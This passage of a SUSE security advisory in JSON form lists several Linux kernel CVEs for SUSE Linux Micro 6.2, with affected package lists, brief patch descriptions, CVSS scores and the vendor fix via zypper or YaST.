"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68741",
"url": "https://www.suse.com/security/cve/CVE-2025-68741"
},
{
"category": "external",
"summary": "SUSE Bug 1255703 for CVE-2025-68741",
"url": "https://bugzilla.suse.com/1255703"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68741"
},
{
"cve": "CVE-2025-68743",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68743"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmshv: Fix create memory region overlap check\n\nThe current check is incorrect; it only checks if the beginning or end\nof a region is within an existing region. This doesn\u0027t account for\nuserspace specifying a region that begins before and ends after an\nexisting region.\n\nChange the logic to a range intersection check against gfns and uaddrs\nfor each region.\n\nRemove mshv_partition_region_by_uaddr() as it is no longer used.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68743",
"url": "https://www.suse.com/security/cve/CVE-2025-68743"
},
{
"category": "external",
"summary": "SUSE Bug 1255708 for CVE-2025-68743",
"url": "https://bugzilla.suse.com/1255708"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68743"
},
{
"cve": "CVE-2025-68764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags\n\nWhen a filesystem is being automounted, it needs to preserve the\nuser-set superblock mount options, such as the \"ro\" flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68764",
"url": "https://www.suse.com/security/cve/CVE-2025-68764"
},
{
"category": "external",
"summary": "SUSE Bug 1255930 for CVE-2025-68764",
"url": "https://bugzilla.suse.com/1255930"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68764"
},
{
"cve": "CVE-2025-68768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68768",
"url": "https://www.suse.com/security/cve/CVE-2025-68768"
},
{
"category": "external",
"summary": "SUSE Bug 1256579 for CVE-2025-68768",
"url": "https://bugzilla.suse.com/1256579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
